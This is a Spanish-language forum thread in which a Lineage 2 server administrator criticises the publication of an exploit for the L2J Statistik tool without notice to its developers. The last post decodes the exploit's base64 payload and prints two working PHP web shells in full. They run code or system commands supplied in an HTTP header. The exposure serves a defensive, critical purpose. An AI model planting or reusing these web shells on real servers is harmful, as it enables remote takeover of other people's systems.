Mensajes

En eso te doy la razon, cada uno es libre de hacerlo como quiera, ahora revisando lo que he escrito veo que no he sido muy "cortes" (siempre peco de eso )

Por cierto, he visto que se ha publicado en la listas de seguridad.

pd.: hace mucho tiempo que visito el foro pero siempre ha sido en "modo bot"... por cierto, no sabia que tenias blog... me he enterado atraves del blog de Chema.

No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).

Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo tambien sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????

Código [Seleccionar] Expandir

base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspOyBpbmlfc2V0KG1heF9leGVjdXRpb25fdGltZSwwKTsgaWYoaXNzZXQoJF9TRVJWRVJbSFRUUF9IT0xBXSkpeyAgICRwaHAgPSBnZXRfbWFnaWNfcXVvdGVzX2dwYygpPyBzdHJpcHNsYXNoZXMoJF9TRVJWRVJbSFRUUF9IT0xBXSk6JF9TRVJWRVJbSFRUUF9IT0xBXTsgZXZhbCgkcGhwLlwiO1wiKTsgfSBkaWU7ID8+");


<?php 
  ob_clean(); 
  echo(codebreak); 
  ini_set(max_execution_time,0); 
  if(isset($_SERVER[HTTP_HOLA])){ 
   $php = get_magic_quotes_gpc()?stripslashes($_SERVER[HTTP_HOLA]):$_SERVER[HTTP_HOLA]; 
   eval($php.\";\"); 
  } 
  die; 
?>

base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspO2luaV9zZXQobWF4X2V4ZWN1dGlvbl90aW1lLDApOyBwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hPTEFdKTsgZGllOyA/

Código [Seleccionar] Expandir

<?php 
  ob_clean(); 
  echo(codebreak); 
  ini_set(max_execution_time,0); 
  passthru($_SERVER[HTTP_HOLA]); 
  die; 
?>